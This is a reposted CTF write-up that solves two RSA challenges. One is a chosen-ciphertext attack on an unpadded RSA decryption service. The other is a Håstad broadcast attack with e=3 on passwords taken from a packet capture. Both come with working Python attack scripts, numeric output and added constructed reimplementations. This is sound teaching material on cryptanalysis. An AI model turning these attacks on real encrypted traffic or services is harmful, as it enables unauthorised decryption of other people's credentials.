ISG RSA System
1. Encrypt
2. Decrypt
3. Debug
4. Exit
Command:
2
Input Ciphertext:
79179219947397673596913141858060853562264183277105064500526121181949051885226022286753492605088856943457103934674109091329935444332268497553408733577823437960592170878157899870065319472135912042160495919712578115084987878867194393987073798043704976793068142053136698484109814814341457569230801157307343303787
Your plaintext:
8667492895277923265820084477869219240741943135031931045224894975821878045181788438218135164652271568971126488881022071

Divide this by the original 3 and convert it to hex:

print  hex(8667492895277923265820084477869219240741943135031931045224894975821878045181788438218135164652271568971126488881022071/3)


0x4953477b63686f73656e5f636970686572746578745f61747461636b5f627265616b735f74657874626f6f6b5f5253417dL

That is the secret. Convert it back to the contents of flag.txt.
The conversion gives the flag:
ISG{chosen_ciphertext_attack_breaks_textbook_RSA}
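The whole chain above (modulus recovery by gcd, then multiplying the debug ciphertext by the ciphertext of 3) is reproduced below against a local stand-in, to show why unpadded RSA must never be exposed as a decryption service. This is an added example, not the challenge server's code: the class, its toy primes, the assumption that the service refuses to decrypt the debug ciphertext itself, and the sample flag are all constructed. It generalizes the page's final step by using a modular inverse of 3 instead of integer division.

```python
from math import gcd


class TextbookRSAService:
    """Constructed stand-in for the challenge server (not its real code)."""

    def __init__(self, flag: bytes):
        p, q = 2**127 - 1, 2**89 - 1              # constructed toy primes
        self._n, self._e = p * q, 65537
        self._d = pow(self._e, -1, (p - 1) * (q - 1))
        self._secret = pow(int.from_bytes(flag, "big"), self._e, self._n)

    def encrypt(self, m: int) -> int:
        return pow(m, self._e, self._n)           # no padding: E(a)E(b) = E(ab) mod N

    def decrypt(self, c: int) -> int:
        if c == self._secret:                     # assumed restriction
            raise PermissionError("refusing to decrypt the secret")
        return pow(c, self._d, self._n)

    def debug(self) -> int:
        return self._secret


def recover_modulus(svc) -> int:
    """N divides E(a)*E(b) - E(a*b); the gcd of several such values is N."""
    g = 0
    for a, b in [(2, 3), (2, 5), (2, 7), (3, 5), (3, 7), (5, 7)]:
        g = gcd(g, svc.encrypt(a) * svc.encrypt(b) - svc.encrypt(a * b))
    for small in range(2, 1000):                  # strip any small cofactor
        while g % small == 0:
            g //= small
    return g


def recover_flag(svc) -> bytes:
    n = recover_modulus(svc)
    blinded = svc.debug() * svc.encrypt(3) % n    # ciphertext of 3*m, not the secret
    three_m = svc.decrypt(blinded)                # the service decrypts it willingly
    m = three_m * pow(3, -1, n) % n               # undo the factor 3 modulo N
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


if __name__ == "__main__":
    print(recover_flag(TextbookRSAService(b"ISG{constructed-sample}")))
```

A randomized padding scheme such as OAEP removes the multiplicative relation the attack relies on, because the product of two valid ciphertexts no longer decrypts to a validly padded message.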

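misc400 丫丫 (Yaya)
The challenge first provides a packet capture. Analyzing it in Wireshark, the HTTP packets include many login.php requests containing submitted data and an IP address. Visiting that address leads to the Yaya site: http://202.120.7.108:8888
Next, reading the Yaya site's code shows that the submitted password is a ciphertext, encrypted with RSA before submission.
On every submission, e, n and rkey are fetched from http://202.120.7.108:8888/getEncryptionKey.php.
From the JS code, rkey does not seem to be used in the computation.
My first idea was a replay attack: modify a request to send the same user, pwd and rkey. There was no response content at all, so that approach was a dead end!

Since this is an encryption/decryption challenge, go back to the RSA algorithm itself.
What we know now: the ciphertext C, the public exponent e=3, and the public modulus n. Extracting all the data submitted to login.php and returned by getEncryptionKey.php from the capture gives 7 corresponding (C, n) pairs.
See the broadcast attack described in the article "Attacks on RSA".
The conditions match exactly. Solve the system of congruences with the Chinese remainder theorem: let the plaintext be p and x = p^3, with x = Ci (mod ni).
Substituting the 7 pairs (Ci, ni) gives x = p^3 =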

14175120305958926640522274902195014616103919921065164655367456408670873419507081538991868269775849615238493972279975630262653906377259396841374194697760562628284775693917230759371994102954191173508878632581527239741913791869171067933153829245033617552680775557775270598493476155753754082661600625507463981121359114994318974078353403670713130071785789595793053108726819835668999782112185208313059587572807230896036108000154937719170579624594507088699802103145938453191293254531505428598270849035967705837874786366450559794299140981395980232456955985348032373385754701012533791554105357639922066058704458092965519407348628154220014053751833930979073433233381842048652920738374791118798215011776212838115730376563369752704929738934158971230677165989193393929010702973551390350613081815668687122545410531336446086

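The next step is to take the cube root of this number, but it has no exact cube root at all. Another dead end!

I thought for a long time and tried other methods, such as factoring n directly. The public modulus n is very large; I ran msieve.exe on it for a long time, and in the end that was a dead end too!

Then I reasoned that since the challenge uses public exponent e=3, this approach should be right. Perhaps in one or more of the 7 logins the password was mistyped, so that x = p^3 is not the same across the whole system of congruences, which makes the solution come out wrong.
How to tell which pairs are right and which are wrong? I thought for a long time without finding any shortcut.
In the end I brute-forced it: take 3, 4, 5 and 6 of the 7 pairs at a time to form the system of congruences, and solve for all the values.
Python script: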

n1=int('c0ee9a0e9267d408a38c11ad009cc013ec8047397cadbe81aef68929032c94e2e665afcc28031995b9f593a652910f41',16)
n2=int('98bd9bc15848d4fc9e6d45f7ed17be2b951c39a1beb94c34262d3bd4c841bea3afacb7c814a3806d5be14224384283a7',16)
n3=int('c6222103be7725ae3ab150786c0100ac424192c187d7c5c9311a09c3f871a6ba142f8db05e01c814203641a69285c55d',16)
n4=int('b5821c26739589a6f291f3f61b4833df1a1b0105202a4d70ddb2d411d999d4b55169f78d5dc3c9b8eb052a2832b218e5',16)
n5=int('c900f03ca5421a4fc73fe496d1d9298c6bd8d83d708ec4e609039ae5f163023549e3b3f31215e6c078023b86def18d3f',16)
n6=int('d069d27923ded540eadf2926f600f6ff373d0f325d2ea1de66f9c7571ecb8778fa07e2e4b23af7e614339147247754d1',16)
n7=int('c0618fdaf330901229661defee6ef221c5090138dec81f481add385d9b9f7f9927194fd79057c60e64bcfeac47332075',16)

b1=int('753f1c4d3bb0f170a227c7d925695cf1b33143fe1d2d6934e4c2b0faaebaef59bdfa02e656ce7e1957835b0011723654',16)
b2=int('42d6df231b6e09acd1f4e125b8d2458e3f294f34e3240001aba82f9ffd714187cdbcbc95dcf5bb34fcaeb48dad52bfc8',16)
b3=int('a6b92bde0560bdb36609186b3dbd034c2e60fdddf97bee03cfd9ffc9fe195208901abcb4a5e45f89d08fb79e20a61aa9',16)
b4=int('5163229bc6f60167c341ce5e8009dccb7a8bca6737023623c4f398bca5c0cc5dfe6f5d0e38bf06be3de162951f6fc472',16)
b5=int('5bab7fb7f32514c4fa859e213ae96cfc659b624a5e9446ef48503f16809b8447f206152f32f43f7219654cf41bca0e88',16)
b6=int('3282d69293ee95422445eb95af6d64f7c4a85ee5f14b5b9935121185142faf822497033bb29866e409d26a8aa821d92e',16)
b7=int('3f0c66ead6290124f0ab8274f0496b5296ec9e1ebf939ac643ca3adf2c9050948ca9e1f1da8130f5755f0ba887edbbab',16)
    
lst=[]
tar1=0
tar2=0

def ex_gcd(a,b):
    global tar1
    global tar2
    if b == 0:
        tar1=1
        tar2=0
    else:
        ex_gcd(b,a%b)
        t=tar1
        tar1=tar2
        tar2=t-a/b*tar2;
        
def gao(lst):
    checkitout=1
    heiweigou=0
    for x in lst:
        checkitout=checkitout*x[1]
    for x in lst:
        yo=checkitout/x[1];
        ex_gcd(yo,x[1])
        heiweigou=heiweigou+(x[0]*yo*(tar1%x[1]))%checkitout
    return (heiweigou+checkitout)%checkitout
lst1=[
     [b1,n1],
     [b2,n2],
     [b3,n3],
     [b4,n4],
     [b5,n5],
     [b6,n6],
     [b7,n7],
        ]
def do(start,cnt,ret):
    if cnt == 0:
        temp = []
        for i in ret:
            temp += [lst1[i]]
        print ret,':',gao(temp)
        return
    for i in range(start,7):
        do(i+1,cnt-1,ret+[i])
        
do(0,3,[])

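Then take the cube root of each of these values. With 2 minutes left, among the 35 results from choosing 3 of the 7 pairs, one finally yielded the correct answer: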

p=1202453802380202612679414065556140558145904072876223837350171076616477832403508974630372232029686435268095467901
hex(p)=0x20000000000000000000000000000004953477b796179615f686168615f776177615f676167615f6775616775617d

Take the latter part: 4953477b796179615f686168615f776177615f676167615f6775616775617d
Converted to ASCII: ISG{yaya_haha_wawa_gaga_guagua}
That is the flag.
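The subset search and the cube-root test described above fit in one short program. This is an added example, not the author's script: it runs on constructed data (five moduli built from well-known primes, three logins with the same constructed password and two with typos) instead of the seven captured pairs, and the function names are this example's own.

```python
from itertools import combinations
from math import prod


def icbrt(x: int) -> int:
    """Largest r with r**3 <= x, by binary search (exact for big integers)."""
    lo, hi = 0, 1 << (x.bit_length() // 3 + 1)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid ** 3 <= x:
            lo = mid
        else:
            hi = mid - 1
    return lo


def crt(pairs) -> int:
    """Solve x = c_i (mod n_i) for pairwise coprime n_i; 0 <= x < prod(n_i)."""
    n_all = prod(n for _, n in pairs)
    x = 0
    for c, n in pairs:
        rest = n_all // n
        x += c * rest * pow(rest, -1, n)
    return x % n_all


def broadcast_search(pairs, k=3):
    """Try every k-subset; keep those whose CRT solution is a perfect cube."""
    hits = []
    for idx in combinations(range(len(pairs)), k):
        x = crt([pairs[i] for i in idx])
        root = icbrt(x)
        if root ** 3 == x:        # only true when all k plaintexts were equal
            hits.append((idx, root))
    return hits


def constructed_capture():
    """Constructed (C, n) pairs with e = 3 and no padding, as in the challenge."""
    primes = [
        (2**127 - 1, 2**130 - 5),
        (2**192 - 2**64 - 1, 2**107 - 1),
        (2**224 - 2**96 + 1, 2**89 - 1),
        (2**255 - 19, 2**61 - 1),
        (2**256 - 2**32 - 977, 2**31 - 1),
    ]
    moduli = [p * q for p, q in primes]
    good = int.from_bytes(b"constructed-password", "big")
    typo1 = int.from_bytes(b"constructed-passwrod", "big")
    typo2 = int.from_bytes(b"constructed-pasword", "big")
    plaintexts = [good, typo1, good, good, typo2]   # logins 1 and 4 are mistyped
    return [(pow(m, 3, n), n) for m, n in zip(plaintexts, moduli)]


def int_to_bytes(m: int) -> bytes:
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


if __name__ == "__main__":
    capture = constructed_capture()
    print("all pairs give a cube:", icbrt(crt(capture)) ** 3 == crt(capture))
    for idx, root in broadcast_search(capture):
        print(idx, int_to_bytes(root))
```

Testing for an exact integer cube avoids the floating-point rounding that makes large cube roots look wrong, and it is the criterion that separates the consistent subset from the ones containing a mistyped password.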
Screenshot and code attached:

Cube root code: l2.py

t1=4041883689533222751920250617404233450553335057728159774738477144172824727867054769407535152386382221081225013038431731518525625408525727797705810136226838277368756458035001570043808801815573869353444045507347000605541437441606187633840537240194856736314988862659955804800018274162934780506967023155818957441879247493850244755238674310809863672328
t2=17851482800376219283744703852299359032832916095865469893009247051337681787238783555942408217566675997938151667310182218054730320780037374762997174598501784189515793635398748080084594352942837823750575220223862794593288097399066157561382229978100522528248794899119569072464385007363573959767531242180810634355032603292485602012315837997928228258224
t3=14034361744822669136923887222655721155193560204666717614196823895507693649990220347445307635593701949815355451066920406376205509101244363551306821602113780930273803410715236249299834506365431556503273088925349085888801439018375454349054528271603690914264559813819042393487879358244175115337714944886292660606070197979160192854277808990098432026191
t4=4199494344433231870443835433052303371444170367108256108290023910416231434239251991828528819136461669876522959751842411292376271781993770887900092292359860111775734632398248264537785365344780834004785620745566933233687155034585038302527845818017305421195949218822522161447509181688559007949235794698112427132777934701136194022418947381488362094155
t5=4578673183897958151164893869108692295685521719483293338710797301376401666965641468744313868009961462330215443601560928924803787466214744118038974997117632248280536792185095404835383887131361055497987617460823915921616965601674672282989354803073623481033262408175230062252932659568699624760770644436929500896363703707239406444401528974168604627570
t6=9607180791757229160024175695536911620650260188656316825766875709970396297929617984432657215809793849093764022003733698222718724919683180859298829661825533171258378753592216950142208831217341184148378458837677525406549589368285647854078171220924224616219101184001607375356327024939178266680168426977187757420378480572599504277586416557302809254954
t7=20642904081007232870615158243828962874931850953305175261860392316967566693251721037676414065257010076931043091590630290243308564465518471655844421941153994350968114084127317533495102964564999519630106613458606815317014601444794622929010917297103656032030847714078305383858075067843040122682987809519979559936959855431673104731629223570708969181404
t8=11091469330828328243058727397232830468464624406416253164897689016570269138955368307822222272516676832191140926765065180683101187169817888255131187613162645536284744476290956219745672131918218719230090050301403973241127113957820147391587351369729386750840552974997974955898057905296745355185101545246395308785221250463758446788224769723980294990655
t9=18582068190863510222237984792647309947944317160839100487380498300030674714478044471426044587507216984278989346308047074015026193246173680338472238600746580894128562735129846247363296991675939465250310095503768597793884175700670632811193505553135361020191068211772674486750714545637197511136528763769793168314114532819690710385480108461663615975910
t10=24698450351188295654245391494628899418324534328578160681185786577327941554843565203709814855956796179133179846303289061675873521527637061986732330487319591170628650167698341845661794135402586847777927522675552531519037842557284435201731156929517319112922670674780267546178142233267659663561824867925415426017818939353075179133475857934003571146539
t11=1738622117183213887075009828299861477174439260238734505291778485381663406644543327878478022050214883852046386644704510229531335357271724376321071048639974406747376887870773524898879450012293891665978146277789782211332956905354458160095814830123669422019963572702409536327463481347931164889670554411901731332129735657207775752916633701
t12=19384822970424914836482455053156795777487093061204845030083018203837894883380856047793884962411762731502552085417296286419529708939882424516236216932587411433798319242277719057187632064549680107319312907893739147090599288634802294257064730246973221267055413825303215360219576018833472396503848539995975978962919877415524149816967571487630109449880
t13=8788554527595976324172119294263270532625852495221612374204904244489627412883076236877951205530859920025170824685255133997453807290000834735301608793922323157112422407932355660394688263432161748211628601881863417970448485171692783735006585097207561453675956796636985509920483425760019912145703069973685043729155011172826497028136132518465397366616
t14=22411511338471451252103639377419157725976518004646774599199725632752139096813358799550205479179491087873688472472164322817725827982296128857721363589791272266023229614014767647446642264151682872227605324354638720475308249989058776482008643974341708850278169701610114432662663166796301650952773994306927890549373606195487128505483561960508160184351
t15=12929788873066333284840338031535435307255748399437484068404292804246500962444119958788597585309589895500856612188483085477978979916343189512077424476303290148542743093767515550317462103085645112262950495237706480614004485613577081340753942973748141725112829700677555534117628706963762279725759647067849816354874740170747417415632647383667501350384
t16=12359463244465700702224808392821681974076839033776895360403897095365172965585436705035425178496962028446690945167766207379916344750145722197303089352071537450135158484357304128198729297479444705760441832994582500007306948116958697096448555058246828796354099100723162905212961119997919279591619851607676306083659836903439499589285499877565389377708
t17=18781422020275392353258813318736933796702434752557318113403755591466981487646391208952028155645597415009781619279533849387635470170059474361787320730185595506893061744584878690606283085493266502946022822651597736946672613558830136640528987790972493309379941842006705694754954290501450173975669853574933732298515379403985882221937569192668382756971
t18=16539960443077462151068370197157193665939003659153761257549198434222105878609166664048171427178544749472447430368303131858417885545230046821046410380577439617389096747275152560285665913872015380683179261480070447213087291325610237941734041176914041911792881671855751455596163686148449221702800713249370329565906228845206086233719973932254256781856
t19=11278312781058274228094564279233511786113100286903941211510141194568101276677054745959838304426777424639747384662474630093478991770675241447286906881927030560180116887453458626028692536718319348675423875398312908199760599675884450374009902633632684700867102132244674805352661201203294791344390564099392299412855427093290414077914615770282552646136
t20=18562330708124503099748943933662656326639596865985810524611265441534839771111177119303971661762166847498157288692877606447356855091999770375292905502101371598329035198745758918762042586116897789572450508269831359271028594614942681581679906578753659697362746896196830383800588213160700829057085910572643641111901564988981122585346545643924029768280
t21=10318284230732897607796392046281037185740760653931506533448434879410688411181170638513133021331426935483716225490072629342958628941190201641084586244187018827510385175445447030554877295616114956043419238650346968170626786372042160311377166163544894195077973760486880113426703918143339297830721258042771289518289725348360701887663600614392646141430
t22=14990418741535715771926000063311403325903402138171179387857980684862569709973231641775284898221663705433107236728748044160795299547043248277931314431288021596859540206386232103198848818295095230155701635133139443174760713021027587835293548894689880568294815506158275306330482120537684980655882197674182344447363089923280400436023486580705808393090
t23=14293883489651914053756521186769884357440736278040203606925666936440985692775225260308379591631466805161171951671979688645126815030473583233948343917355238858929497725006596045299643802985915690034870123073823664933375346522434886722016424078397675532270403191512042714226281235485987641317282632339788951874190130551940850097371318471818237536918
t24=3573279105622252947846398002246393051634703987123278311469555352908583056857151650179864566369692900992192699537678133173826452787501635279111410462874850118448410240025481471831996588849784926098010101836299967182563022946461796424396337523334084967895178856442566085140234524729504640228366787880652001835427104243413024891462519590119533464403
t25=10961720465687122328648303833532640225913573916857051795199965694130377248579027175744720908231090599721859990699967833824801545832074359557820042726018847293664839915282878164699221998322242766572567721103660497123096556856616463669758237235237654640251348175644406643232171622491084179214787976093815506350825023023632432770955433944478519950931
t26=26217632414191679053109488733210025515391559669134995760468000925502823161700915417923699916129593445859713349914754461832824847015518934340025684306787123451816953844277157748018455203005749252679059702426183264434165676335209298988652050275752769645919015438277906964587955259133030744890524951846209446793315383051440523155220946869499769657712
t27=7657084633846394906016978123777468467908126903919475367440170388679883559605494261714794121327711473201125330112276246453613940065889426733015072101136188709417624786744058198952106797791912023333998449497597713454452696847113218521806733198684308173793798519920079527011013434580753128765720661150834766112794144353631895353035650582679604845617
t28=2343502801916879890784003696424020729709007129782880777563445591878667148106665764356184980867566803039503289148059244872482590067757256099644215713019542335196239351654436734081316572618663817712433582561328074683922410392156920981125533764583142246883656412602227035336477837087935628968785654027378753316116957407760221364747003066874013585879
t29=19495352251977498048370814615824104567311605295567479163118959102358311425293855015766898557225251051455884396546942132573009708630687934777615465400689052863554776238864892366608858025810411424540368817693444432347980552698340675304407990315371917358398823676983111168934989944497189989274599698460197397933329581699328540995904828004959559299944
t30=10504518313577233585526426930928650580711710221983783424892413286989519467731301820052731782152017207265679030251912511498130851360845815112400698922823231793790978358866421450745072868995351000448213680701974025180526317468287744933546631829518263145511374727551308561225307579728746172556061245801580548750110914335305930060859393765914016625774
t31=18433847427878149004987882762554422279900047917090637634418177058601565323526793607402397237149332732385355225601294822689050152333235373891136011812577069244450386893624636561781406607373214147565693098728405756229193606010120175519030429257229676942523520252014706636981129226688139221948218297591969762627638399779436384229834096309774369528522
t32=1535706149581400739920306776716191463579024829768549812557823334316330606313485147367148393039861781879684189268112578474894624700814883359665362029261272279888384542269491321749413092333039363624766997313028873301557721609169677098317960576108807969863998999052673774361043444294594407664949703134965814055331765932788565995389839840810697688662
t33=13565500785848704635814593144837197544454236005474278430579925778323118791075118781377662661518174845621399550642538602455757446856953580413056218633806302400220734951002864386768902090465495072952225991491464023560450086981352007612141662487167900823291193761506513916055488193424389550058993254391005597445715109512705212428777291598408263196966
t34=12373601003669163343752673327921781806861413738331671244330759952753582630269973478343136396534175142941157215215390421385685708771356458903192858202532669530833600070045767713747032283044802736490124957289167105854049438982926658252954080285798867481999851323146828548629204859358369191722128628519899601387805747024004262192385088092823340200383
t35=7330841437220688673827561889989284469823772035255910984460023042949416408521981790913743802757865905579665380214127251816849376047814993545533194994357682512240681712325589367196912308736446507335079746753604255694733178677469618510744063864989498979391439147261769138627580711782879283434961038901592144263784234053611386353403587731563813360124
lst1=[
     [t1],
     [t2],
     [t3],
     [t4],
     [t5],
     [t6],
     [t7],
     [t8],
     [t9],
     [t10],
     [t11],
     [t12],
     [t13],
     [t14],
     [t15],
     [t16],
     [t17],
     [t18],
     [t19],
     [t20],
     [t21],
     [t22],
     [t23],
     [t24],
     [t25],
     [t26],
     [t27],
     [t28],
     [t29],
     [t30],
     [t31],
     [t32],
     [t33],
     [t34],
     [t35],
]
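import math

def div(l, r, x):
    # Binary search in [l, r) for an integer whose cube is exactly x.
    # Returns 0 when x is not a perfect cube.
    if l == r:
        return 0
    mid = (l + r) // 2
    temp = mid * mid * mid
    if temp == x:
        return mid
    if temp > x:
        return div(l, mid, x)
    return div(mid + 1, r, x)

def pow10(x):
    # 10**x computed with integer arithmetic only
    ret = 1
    for i in range(0, x):
        ret = ret * 10
    return ret

def test(x):
    # Estimate the number of decimal digits of the cube root
    # to bound the search interval.
    n = math.floor(math.log(x, 10) / 3)
    n = int(n)
    left = pow10(n - 2) - 1
    right = pow10(n + 3) * 9 + 1
    return div(left, right, x)

index = 1
for i in lst1:
    # Print the cube root of each t value (0 if it is not a perfect cube)
    print("%d : %d" % (index, test(i[0])))
    index += 1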

The result is

1202453802380202612679414065556140558145904072876223837350171076616477832403508974630372232029686435268095467901

Converted to hexadecimal:

0x20000000000000000000000000000004953477b796179615f686168615f776177615f676167615f6775616775617dL

Converting 4953477b796179615f686168615f776177615f676167615f6775616775617d to ASCII gives
ISG{yaya_haha_wawa_gaga_guagua}
That is the flag.
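The perfect-cube check and the hex-to-ASCII step above, as an added Python 3 example (not part of the original writeup). It uses an iterative integer-only cube root, since floats cannot hold numbers of this size. The input cube is constructed from the hex value printed on the page, and the padding layout in `strip_padding` (one marker byte, then zero bytes) is an assumption read off that hex value.

```python
# Hex value printed on the page (Python 2's trailing "L" dropped).
PAGE_HEX = "20000000000000000000000000000004953477b796179615f686168615f776177615f676167615f6775616775617d"

def icbrt(x):
    """Return floor(cube root of x) for x >= 0 using integer arithmetic only."""
    if x < 0:
        raise ValueError("x must be non-negative")
    lo = 0
    hi = 1 << ((x.bit_length() + 2) // 3)   # hi**3 > x always holds
    # Invariant: lo**3 <= x < hi**3
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if mid ** 3 <= x:
            lo = mid
        else:
            hi = mid
    return lo

def exact_cube_root(x):
    """Return the cube root of x if x is a perfect cube, else None."""
    r = icbrt(x)
    return r if r ** 3 == x else None

def strip_padding(m):
    """Assumed layout: one marker byte, zero bytes, then the ASCII message."""
    raw = m.to_bytes((m.bit_length() + 7) // 8, "big")
    return raw[1:].lstrip(b"\x00").decode("ascii")

def recover(candidates):
    """Decode every candidate that is a perfect cube; skip the rest."""
    found = []
    for c in candidates:
        root = exact_cube_root(c)
        if root is not None:
            found.append(strip_padding(root))
    return found

def demo():
    m = int(PAGE_HEX, 16)
    cube = m ** 3   # constructed input, not one of the page's t values
    return recover([cube - 1, cube, cube + 12345])

if __name__ == "__main__":
    print(demo())
```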

0x05 Afterword
Finally, here is the official writeup as well.
Official writeup

I hope team 三叶草 does well in the finals. Good luck, everyone~

FROM :appleu0.sinaapp.com | Author:appleu0

admin
  • Posted on 2022-05-17 12:10:34
  • When reposting, please keep the link to this article (CN-SEC中文网: thanks to the original author for their hard work):
                  2014 isg writeup http://cn-sec.com/archives/1012310.html
